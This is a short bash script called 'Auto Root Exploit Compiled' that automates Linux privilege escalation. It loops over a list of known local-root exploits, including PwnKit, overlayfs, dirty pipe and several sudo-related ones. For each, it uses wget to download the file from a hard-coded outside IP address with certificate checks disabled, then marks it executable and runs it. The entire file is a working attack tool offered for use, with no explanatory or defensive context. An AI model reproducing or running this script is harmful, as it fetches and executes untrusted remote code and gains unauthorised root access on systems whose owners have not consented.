#!/bin/bash
clear
echo "==================================================="
echo "              Auto Root Exploit Compiled"
echo "==================================================="

cve=(
    PwnKit
    overlayfs
    gameoverlay
    dirty_sockv2.py
    cve-2017-16995
    dpipe
    ofs
    raceabrt
    ptrace_traceme_root
    lpe.sh
    screenroot.sh
    upstream44
    exploit_cent7_userspec.py
    exp_file_credential
    timeoutpwn
    exploit_timestamp_race
    exploit_defaults_mailer.py
    exploit_nss.py 
)

for cvenya in "${cve[@]}"; do
    echo " "
    echo "[+] Trying Exploit $cvenya"
    wget -q --no-check-certificate http://64.227.152.176/localroot/$cvenya
    chmod 0755 $cvenya
    if [[ "$cvenya" =~ "dpipe" ]];
    then
    ./$cvenya --root
    else
      if [[ "$cvenya" =~ ".py" ]];
      then
         python3 $cvenya
      else
         ./$cvenya
       fi
    fi
done

